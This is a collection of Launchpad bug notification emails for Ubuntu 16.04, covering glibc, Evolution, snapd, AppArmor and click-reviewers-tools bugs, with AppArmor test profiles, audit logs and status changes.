http://patchwork.sourceware.org/patch/7679/ The problem is that glibc in Y is still using the old socketcall() interface on i386. It needs to be updated to use the new calls. A possible caveat is that this might create problems for running newer binaries on older kernels on i386 (as we sometimes do with builders) because they won't have the new syscalls. A solution could involve checking for ENOSYS and trying again via the old route. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/glibc/+bug/1576066/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1613805] Re: [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text
** Changed in: evolution (Ubuntu Artful) Status: In Progress => Fix Released ** Changed in: evolution (Ubuntu Artful) Assignee: Jamie Strandboge (jdstrand) => (unassigned) ** Changed in: evolution (Ubuntu Xenial) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: evolution (Ubuntu Xenial) Status: New => In Progress -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1613805 Title: [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text Status in evolution package in Ubuntu: Fix Released Status in evolution source package in Xenial: In Progress Status in evolution source package in Artful: Fix Released Bug description: [Impact] Ubuntu 16.04 evolution users sometimes send emails with ###SELECTION_END### due to a copy/paste error in the EHTMLEditorView code when converting HTML to plain text. This is fixed in newer Ubuntu releases. The fix is a from upstream: https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html [Test Case] TODO [Regression Potential] The regression potential is considered low since the change is minimal and obviously correct. In addition I personally used the patch for months (until upgrading to 17.04) and have several users how also use it without issue. == Original description == From https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html: "EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text Otherwise the ##SELECTON_END## string could be left in the output." I sometimes see this from people on xenial. Patch is in the commit list needs a light backport. I will attach a debdiff if it works. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution/+bug/1613805/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1613805] Re: [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text
** Description changed: - From https://mail.gnome.org/archives/commits- - list/2016-May/msg06756.html: + [Impact] + Ubuntu 16.04 evolution users sometimes send emails with ###SELECTION_END### due to a copy/paste error in the EHTMLEditorView code when converting HTML to plain text. + + This is fixed in newer Ubuntu releases. The fix is a from upstream: + https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html + + [Test Case] + TODO + + [Regression Potential] + The regression potential is considered low since the change is minimal and obviously correct. In addition I personally used the patch for months (until upgrading to 17.04) and have several users how also use it without issue. + + + == Original description == + From https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html: "EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text Otherwise the ##SELECTON_END## string could be left in the output." I sometimes see this from people on xenial. Patch is in the commit list needs a light backport. I will attach a debdiff if it works. ** Changed in: evolution (Ubuntu) Status: Confirmed => In Progress ** Changed in: evolution (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Also affects: evolution (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: evolution (Ubuntu Artful) Importance: Undecided Assignee: Jamie Strandboge (jdstrand) Status: In Progress -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1613805 Title: [evolution/wip/webkit2] EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text Status in evolution package in Ubuntu: In Progress Status in evolution source package in Xenial: New Status in evolution source package in Artful: In Progress Bug description: [Impact] Ubuntu 16.04 evolution users sometimes send emails with ###SELECTION_END### due to a copy/paste error in the EHTMLEditorView code when converting HTML to plain text. This is fixed in newer Ubuntu releases. The fix is a from upstream: https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html [Test Case] TODO [Regression Potential] The regression potential is considered low since the change is minimal and obviously correct. In addition I personally used the patch for months (until upgrading to 17.04) and have several users how also use it without issue. == Original description == From https://mail.gnome.org/archives/commits-list/2016-May/msg06756.html: "EHTMLEditorView - Restore the selection end mark correctly when processing HTML to plain text Otherwise the ##SELECTON_END## string could be left in the output." I sometimes see this from people on xenial. Patch is in the commit list needs a light backport. I will attach a debdiff if it works. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evolution/+bug/1613805/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1626359] Re: Cannot authorise quotactl syscall for Q_GETQUOTA
This bug is getting slurped into changelogs but it is not fixed in master since the fix was reverted due to https://github.com/snapcore/snapd/pull/2810 not being merged yet. Marking all Ubuntu releases as still affected. ** Changed in: snapd (Ubuntu Trusty) Status: Fix Released => In Progress ** Changed in: snapd (Ubuntu Xenial) Status: Fix Released => In Progress ** Changed in: snapd (Ubuntu Yakkety) Status: Fix Released => In Progress ** Changed in: snapd (Ubuntu Trusty) Status: In Progress => Triaged ** Changed in: snapd (Ubuntu Xenial) Status: In Progress => Triaged ** Changed in: snapd (Ubuntu Yakkety) Status: In Progress => Triaged -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1626359 Title: Cannot authorise quotactl syscall for Q_GETQUOTA Status in Snappy: In Progress Status in snapd package in Ubuntu: Triaged Status in snapd source package in Trusty: Triaged Status in snapd source package in Xenial: Triaged Status in snapd source package in Yakkety: Triaged Bug description: While debugging a snap I get this security error ``` = Seccomp = Time: Sep 22 03:54:47 Log: auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c03e 179(quotactl) compat=0 ip=0x7fa06ab2d3fa code=0x0 Syscall: quotactl ``` There is no workaround given, so I've added a security override, but it doesn't do anything. ``` transmission-daemon: command: transmission-init start stop-command: transmission-init stop daemon: forking plugs: [network, network-bind, quotactl] ... plugs: quotactl: command: binary security-override: syscalls: [quotactl] ``` There doesn't seem to be a ready-made interface loaded at install time which would include that syscall, so I can't find a solution for that problem. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1626359/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1626359] Re: Cannot authorise quotactl syscall for Q_GETQUOTA
Most of the fix for this landed in 2.23, but the policy changes were reverted until https://github.com/snapcore/snapd/pull/2810 is merged. In other words, this bug is not Fix Committed and there is no need to test that this is fixed. ** Changed in: snapd (Ubuntu Trusty) Status: Fix Committed => Triaged ** Changed in: snapd (Ubuntu Xenial) Status: Fix Committed => Triaged ** Changed in: snapd (Ubuntu Yakkety) Status: Fix Committed => Triaged ** Changed in: snappy Status: Fix Committed => In Progress ** Changed in: snapd (Ubuntu) Status: Fix Released => Triaged ** Tags removed: verification-needed -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1626359 Title: Cannot authorise quotactl syscall for Q_GETQUOTA Status in Snappy: In Progress Status in snapd package in Ubuntu: Triaged Status in snapd source package in Trusty: Triaged Status in snapd source package in Xenial: Triaged Status in snapd source package in Yakkety: Triaged Bug description: While debugging a snap I get this security error ``` = Seccomp = Time: Sep 22 03:54:47 Log: auid=4294967295 uid=0 gid=0 ses=4294967295 pid=12869 comm="transmission-da" exe="/snap/transmission/x1/bin/transmission-daemon" sig=31 arch=c03e 179(quotactl) compat=0 ip=0x7fa06ab2d3fa code=0x0 Syscall: quotactl ``` There is no workaround given, so I've added a security override, but it doesn't do anything. ``` transmission-daemon: command: transmission-init start stop-command: transmission-init stop daemon: forking plugs: [network, network-bind, quotactl] ... plugs: quotactl: command: binary security-override: syscalls: [quotactl] ``` There doesn't seem to be a ready-made interface loaded at install time which would include that syscall, so I can't find a solution for that problem. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1626359/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1658219] Re: flock not mediated by 'k'
4.10.0-8.10-generic has the fix for this bug so marking the zesty task
as released.
** Changed in: linux (Ubuntu)
Status: Incomplete => Fix Released
** Changed in: apparmor
Status: Triaged => In Progress
** Changed in: apparmor
Assignee: (unassigned) => John Johansen (jjohansen)
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1658219
Title:
flock not mediated by 'k'
Status in AppArmor:
In Progress
Status in linux package in Ubuntu:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in linux source package in Yakkety:
Fix Committed
Bug description:
$ cat ./apparmor.profile
#include
profile test {
#include
/bin/bash ixr,
/dev/pts/* rw,
/usr/bin/flock ixr,
# Not blocked:
# aa-exec -p test -- flock -w 1 /tmp/test.lock -c true
/tmp/test.lock rw,
}
$ sudo apparmor_parser -r ./apparmor.profile
$ aa-exec -p test -- flock -w 1 /tmp/test.lock -c true && echo yes
yes
$ ls -l /tmp/test.lock
-rw-rw-r-- 1 jamie jamie 0 Jan 20 15:57 /tmp/test.lock
The flock command uses flock(LOCK_EX) and I expected it to be blocked
due to the lack of 'k'.
apparmor userspace 2.10.95-0ubuntu2.5 (xenial) and 4.9.0-12.13-generic
kernel on amd64.
To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1658219/+subscriptions
___
Mailing list: https://launchpad.net/~group.of.nepali.translators
Post to : group.of.nepali.translators@lists.launchpad.net
Unsubscribe : https://launchpad.net/~group.of.nepali.translators
More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1648903] Re: Permission denied and inconsistent behavior in complain mode with 'ip netns list' command
This is fixed with 4.10.0-8.10-generic. Marking zesty task as fixed.
** Changed in: linux (Ubuntu)
Status: Incomplete => Fix Released
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1648903
Title:
Permission denied and inconsistent behavior in complain mode with 'ip
netns list' command
Status in AppArmor:
New
Status in linux package in Ubuntu:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in linux source package in Yakkety:
Fix Committed
Bug description:
On 16.04 with Ubuntu 4.4.0-53.74-generic 4.4.30
With this profile:
#include
profile test (attach_disconnected,complain) {
#include
/{,usr/}{,s}bin/ip ixr, # COMMENT OUT THIS RULE TO SEE WEIRDNESS
capability sys_admin,
capability net_admin,
capability sys_ptrace,
network netlink raw,
ptrace (trace),
/ r,
/run/netns/ rw,
/run/netns/* rw,
mount options=(rw, rshared) -> /run/netns/,
mount options=(rw, bind) /run/netns/ -> /run/netns/,
mount options=(rw, bind) / -> /run/netns/*,
mount options=(rw, rslave) /,
mount options=(rw, rslave), # LP: #1648245
umount /sys/,
umount /,
/bin/dash ixr,
}
Everything is fine when I do:
$ sudo apparmor_parser -r /home/jamie/apparmor.profile && sudo aa-exec -p
test -- sh -c 'ip netns list'
$
and there are no ALLOWED entries in syslog.
However, if I comment out the '/{,usr/}{,s}bin/ip ixr,' rule, I get a
permission denied and a bunch of ALLOWED entries:
$ sudo apparmor_parser -r /home/jamie/apparmor.profile && sudo aa-exec -p
test -- sh -c 'ip netns list'
open("/proc/self/ns/net"): Permission denied
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.862629] audit: type=1400
audit(1481324889.782:469): apparmor="STATUS" operation="profile_replace"
profile="unconfined" name="test" pid=4314 comm="apparmor_parser"
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870339] audit: type=1400
audit(1481324889.790:470): apparmor="ALLOWED" operation="exec" profile="test"
name="/bin/ip" pid=4317 comm="sh" requested_mask="x" denied_mask="x" fsuid=0
ouid=0 target="test//null-/bin/ip"
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870559] audit: type=1400
audit(1481324889.790:471): apparmor="ALLOWED" operation="open"
profile="test//null-/bin/ip" name="/etc/ld.so.cache" pid=4317 comm="ip"
requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870628] audit: type=1400
audit(1481324889.790:472): apparmor="ALLOWED" operation="open"
profile="test//null-/bin/ip" name="/lib/x86_64-linux-gnu/libdl-2.23.so"
pid=4317 comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870703] audit: type=1400
audit(1481324889.790:473): apparmor="ALLOWED" operation="open"
profile="test//null-/bin/ip" name="/lib/x86_64-linux-gnu/libc-2.23.so" pid=4317
comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870861] audit: type=1400
audit(1481324889.790:474): apparmor="ALLOWED" operation="file_mprotect"
profile="test//null-/bin/ip" name="/bin/ip" pid=4317 comm="ip"
requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.870913] audit: type=1400
audit(1481324889.790:475): apparmor="ALLOWED" operation="file_mprotect"
profile="test//null-/bin/ip" name="/lib/x86_64-linux-gnu/ld-2.23.so" pid=4317
comm="ip" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871019] audit: type=1400
audit(1481324889.790:476): apparmor="ALLOWED" operation="create"
profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink"
sock_type="raw" protocol=0 requested_mask="create" denied_mask="create"
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871066] audit: type=1400
audit(1481324889.790:477): apparmor="ALLOWED" operation="setsockopt"
profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink"
sock_type="raw" protocol=0 requested_mask="setopt" denied_mask="setopt"
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871099] audit: type=1400
audit(1481324889.790:478): apparmor="ALLOWED" operation="setsockopt"
profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink"
sock_type="raw" protocol=0 requested_mask="setopt" denied_mask="setopt"
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871128] audit: type=1400
audit(1481324889.790:479): apparmor="ALLOWED" operation="bind"
profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink"
sock_type="raw" protocol=0 requested_mask="bind" denied_mask="bind"
Dec 9 17:08:09 sec-xenial-amd64 kernel: [ 3117.871672] audit: type=1400
audit(1481324889.794:480): apparmor="ALLOWED" operation="getsockname"
profile="test//null-/bin/ip" pid=4317 comm="ip" family="netlink"
sock_typ
[Group.of.nepali.translators] [Bug 1611444] Re: Cannot share a namespaces created with 'ip netns' between apps in a devmode SNAP
Marking fix released since 2.20 is available in 16.04 now. ** Changed in: snap-confine (Ubuntu Xenial) Status: In Progress => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1611444 Title: Cannot share a namespaces created with 'ip netns' between apps in a devmode SNAP Status in Snappy Launcher: Fix Released Status in Snappy: Invalid Status in snap-confine package in Ubuntu: Fix Released Status in snap-confine source package in Xenial: Fix Released Bug description: [Impact] snap-confine uses linux namespaces (specifically the mount namespace) to give each started snap application process an isolated an unique view of the filesystem. This prevented applications using namespaces through bind mounted files, e.g. using the "ip netns" command as any changes to the namespace would be "locked" in the unique mount namespace of each application process. Now snap-confine is re-designed to put all applications belonging to a given snap in the same mount namespace. The first started application creates and persists the mount namespace (in a way similar to running the command: unshare -m /path/to/file) and all other processes for all apps in the same snap just join that populated namespace. For more information about the execution environment, please see this article http://www.zygoon.pl/2016/08/snap-execution-environment.html [Test Case] The test case can be found here: https://github.com/snapcore/snap-confine/blob/master/spread-tests/main /mount-ns-sharing/task.yaml The test case is ran automatically for each pull request and for each final release. It can be reproduced manually by executing the shell commands listed in the prepare/execute/restore phases manually. The commands there assume that snapd and snap-confine are installed. No other additional setup is necessary. Note that this feature affects every application in every snap. [Regression Potential] * Regression potential is moderate. This change is large and intrusive and has managed to uncover bugs in the kernel implementation of apparmor (e.g. https://bugs.launchpad.net/apparmor/+bug/1624497) The feature was tested extensively by the upstream developers but still a potential for unexpected breakage is significant. [Other Info] * This bug is a part of a major SRU that brings snap-confine in Ubuntu 16.04 in line with the current upstream release 1.0.41. * snap-confine is technically an integral part of snapd which has an SRU exception and is allowed to introduce new features and take advantage of accelerated procedure. For more information see https://wiki.ubuntu.com/SnapdUpdates == # Pre-SRU bug description follows # == Please see: https://www.mail-archive.com/snapcraft@lists.ubuntu.com/msg00542.html for additional details. It was requested that I move that discussion to this bug report. In summary it appears that multions "apps" in a SNAP cannot share the same NETNS namespace. If one app create a namespace the other apps in SNAP cannot use it. They get assorted errors like: RTNETLINK answers: Invalid argument Please see the details in the mail archive posting. To manage notifications about this bug go to: https://bugs.launchpad.net/snap-confine/+bug/1611444/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1630040] [NEW] [SRU] update to 1.0.42
Public bug reported: TODO... ** Affects: snap-confine (Ubuntu) Importance: Undecided Status: Fix Released ** Affects: snap-confine (Ubuntu Xenial) Importance: Undecided Assignee: Zygmunt Krynicki (zyga) Status: In Progress ** Affects: snap-confine (Ubuntu Yakkety) Importance: Undecided Status: Fix Released ** Also affects: snap-confine (Ubuntu Yakkety) Importance: Undecided Status: New ** Also affects: snap-confine (Ubuntu Xenial) Importance: Undecided Status: New ** Changed in: snap-confine (Ubuntu Yakkety) Status: New => Fix Released ** Changed in: snap-confine (Ubuntu Xenial) Status: New => In Progress ** Changed in: snap-confine (Ubuntu Xenial) Assignee: (unassigned) => Zygmunt Krynicki (zyga) -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1630040 Title: [SRU] update to 1.0.42 Status in snap-confine package in Ubuntu: Fix Released Status in snap-confine source package in Xenial: In Progress Status in snap-confine source package in Yakkety: Fix Released Bug description: TODO... To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/snap-confine/+bug/1630040/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1606277] Re: log-observe interface is broken in latest snap-confine
This was fixed 1.0.38-0ubuntu0.16.04.3 in xenial. ** Changed in: snap-confine (Ubuntu Xenial) Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1606277 Title: log-observe interface is broken in latest snap-confine Status in Snappy Launcher: Fix Released Status in snap-confine package in Ubuntu: Fix Released Status in snap-confine source package in Xenial: Fix Released Status in snap-confine source package in Yakkety: Fix Released Bug description: The log-observe interface is broken due to how we handle bind mounts now. This can be seen with 'snappy-debug': $ sudo snap install snappy-debug $ sudo snap connect snappy-debug:log-observe ubuntu-core:log-observe $ sudo /snap/bin/snappy-debug.security scanlog kernel.printk_ratelimit = 0 Traceback (most recent call last): File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 580, in sys.exit(main()) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 569, in main from_end=opt.only_new) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 92, in __init__ self.scan_log(log_file, snap_name, follow, from_end) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 157, in scan_log log = open_file_read(log_file) File "/snap/snappy-debug/22/bin/snappy-security-scanlog", line 71, in open_file_read orig = codecs.open(path, 'r', "UTF-8", errors="replace") File "/usr/lib/python3.5/codecs.py", line 895, in open file = builtins.open(filename, mode, buffering) FileNotFoundError: [Errno 2] No such file or directory: '/var/log/syslog' This is because /var/log/syslog is not available at runtime due to the bind mounts. This can be shown by installing hello-world, adjusting /var/lib/snapd/apparmor/profiles/snap.hello-world.sh to have "/**/ r," (to be able to read any directory), reloading the profile, then doing: $ hello-world.sh ... bash-4.3$ ls /var/log/ alternatives.log btmp dpkg.log fsck watchdog bootstrap.log dmesg faillog lastlog wtmp This may also be a problem with other interfaces, I haven't checked extensively, though it seems that /var/lib/extrausers (from the nameservice abstraction) won't work right, and (at least) ppp (/var/log/ppp) and timezone-control (/usr/share/zoneinfo) are also affected. WORKAROUND for snappy-debug: launch outside of the launcher: $ sudo SNAP=/snap/snappy-debug/current PATH=$PATH:/snap/snappy-debug/current/bin /snap/snappy-debug/current/bin/snappy-security scanlog To manage notifications about this bug go to: https://bugs.launchpad.net/snap-confine/+bug/1606277/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1584346] Re: Store reports "package contains external symlinks: usr/lib/x86_64-linux-gnu/libmvec.so lint-snap-v2_external_symlinks"
Fixed in upstream 0.44 and in 16.10. ** Also affects: click-reviewers-tools (Ubuntu) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Yakkety) Importance: Undecided Status: New ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: New => Fix Released ** Changed in: click-reviewers-tools Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1584346 Title: Store reports "package contains external symlinks: usr/lib/x86_64 -linux-gnu/libmvec.so lint-snap-v2_external_symlinks" Status in Canonical Click Reviewers tools: Fix Released Status in click-reviewers-tools package in Ubuntu: Fix Released Status in click-reviewers-tools source package in Xenial: New Status in click-reviewers-tools source package in Yakkety: Fix Released Bug description: I think this bug is an issue of the ubuntu store, if this is not the correct project to report to, please re-assign to the correct one. When I upload my package to the store, it reports this failure: package contains external symlinks: usr/lib/x86_64-linux-gnu/libmvec.so lint-snap-v2_external_symlinks But ubuntu-core has the necessary file: $ ls -l /snap/ubuntu-core/current/lib/x86_64-linux-gnu/libmvec* -rw-r--r-- 1 root root 166368 Apr 15 06:16 /snap/ubuntu-core/current/lib/x86_64-linux-gnu/libmvec-2.23.so lrwxrwxrwx 1 root root 15 Apr 15 06:16 /snap/ubuntu-core/current/lib/x86_64-linux-gnu/libmvec.so.1 -> libmvec-2.23.so This is in my snap: $ ls -l /snap/shadowsocks/current/usr/lib/x86_64-linux-gnu/libmvec.so* lrwxrwxrwx 1 root root 34 Apr 15 06:17 /snap/shadowsocks/current/usr/lib/x86_64-linux-gnu/libmvec.so -> /lib/x86_64-linux-gnu/libmvec.so.1 /lib/x86_64-linux-gnu/libmvec.so.1 was not in a previous version of ubuntu-core, so I wonder if this failure is due to the check in ubuntu store is not up-to-date? To manage notifications about this bug go to: https://bugs.launchpad.net/click-reviewers-tools/+bug/1584346/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1583259] Re: Snappy needs to influence environment variables in applications
Fixed review tools in upstream 0.44 and in 16.10. ** Also affects: click-reviewers-tools (Ubuntu) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Xenial) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Yakkety) Importance: Undecided Status: New ** Changed in: click-reviewers-tools Status: Fix Committed => Fix Released ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: New => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1583259 Title: Snappy needs to influence environment variables in applications Status in Canonical Click Reviewers tools: Fix Released Status in Snappy Launcher: Invalid Status in Snapcraft: Triaged Status in Snappy: New Status in click-reviewers-tools package in Ubuntu: Fix Released Status in click-reviewers-tools source package in Xenial: New Status in click-reviewers-tools source package in Yakkety: Fix Released Bug description: [Impact] * Adding an environment keyword to snapcraft.yaml, which will make it to snap.yaml which the launcher will use to setup the environment. * This reduces the amount of wrapper files. [Test Case] 1. Run `snapcraft` on the ros demo. 2. Install the snap. 3. snap should run. (if it doesn't it mostly likely means the environent was setup incorrectly). 4. snap.yaml's `assumes` gets a `snap-run` tag. [Regression Potential] * Very low. Environment that was previously setup by wrapper scripts could be missing when the launcher launches using the environment keyword. * The use of `assumes` will make sure this doesn't break people on older versions of snapd or snap-run -- We see a common pattern across many snaps, all apps are really using wrappers to set environment variables. I'd like to propose that this is exposed as first class feature in snapcraft (same like plugs and slots), snappy (where interfaces can affect variables and snappy can have sensible defaults) and ubuntu-core-launcher (to actually apply those variables to each started process). As a bit of context, this is a wrapper for a non trivial but still common app: the calculator: https://bazaar.launchpad.net/~ubuntu-desktop/+junk/gnome-calculator- snap/view/head:/calc#L3 The wrapper is 44 lines long, all of which set up environment variables. Support environment variable that would be available to snaps. The form should look like snapcraft.yaml name: ... version: ... ... environment: # these apply to all snaps ENV1: value1 ENV2: value2 apps: app1: ... environment: ENV1: value1 # takes precedence over global ones These environment values would be transported to snap.yaml To manage notifications about this bug go to: https://bugs.launchpad.net/click-reviewers-tools/+bug/1583259/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1595184] Re: tools do not handled abbreviated toplevel slots and plugs syntax correctly
Fixed in upstream 0.44 and in 16.10. ** Also affects: click-reviewers-tools (Ubuntu) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Yakkety) Importance: Undecided Status: New ** Also affects: click-reviewers-tools (Ubuntu Xenial) Importance: Undecided Status: New ** Changed in: click-reviewers-tools (Ubuntu Yakkety) Status: New => Fix Released -- You received this bug notification because you are a member of नेपाली भाषा समायोजकहरुको समूह, which is subscribed to Xenial. Matching subscriptions: Ubuntu 16.04 Bugs https://bugs.launchpad.net/bugs/1595184 Title: tools do not handled abbreviated toplevel slots and plugs syntax correctly Status in Canonical Click Reviewers tools: Fix Released Status in click-reviewers-tools package in Ubuntu: Fix Released Status in click-reviewers-tools source package in Xenial: New Status in click-reviewers-tools source package in Yakkety: Fix Released Bug description: This should be valid, but the review tools flag as an error: apps: networkmanager: command: command-networkmanager.wrapper daemon: simple slots: - service nmcli: command: command-nmcli.wrapper plugs: - nmcli architectures: - amd64 confinement: strict description: ... name: network-manager plugs: nmcli: network-manager slots: service: network-manager summary: Network management framework version: 1.2.2-1 With the above, the tools error with: unknown interface 'service' lint-snap-v2_slots (service, service) unknown interface 'nmcli' lint-snap-v2_plugs (nmcli, nmcli) To manage notifications about this bug go to: https://bugs.launchpad.net/click-reviewers-tools/+bug/1595184/+subscriptions ___ Mailing list: https://launchpad.net/~group.of.nepali.translators Post to : group.of.nepali.translators@lists.launchpad.net Unsubscribe : https://launchpad.net/~group.of.nepali.translators More help : https://help.launchpad.net/ListHelp
[Group.of.nepali.translators] [Bug 1608943] Re: rename of click-reviewers LP group broke fetch of apparmor json
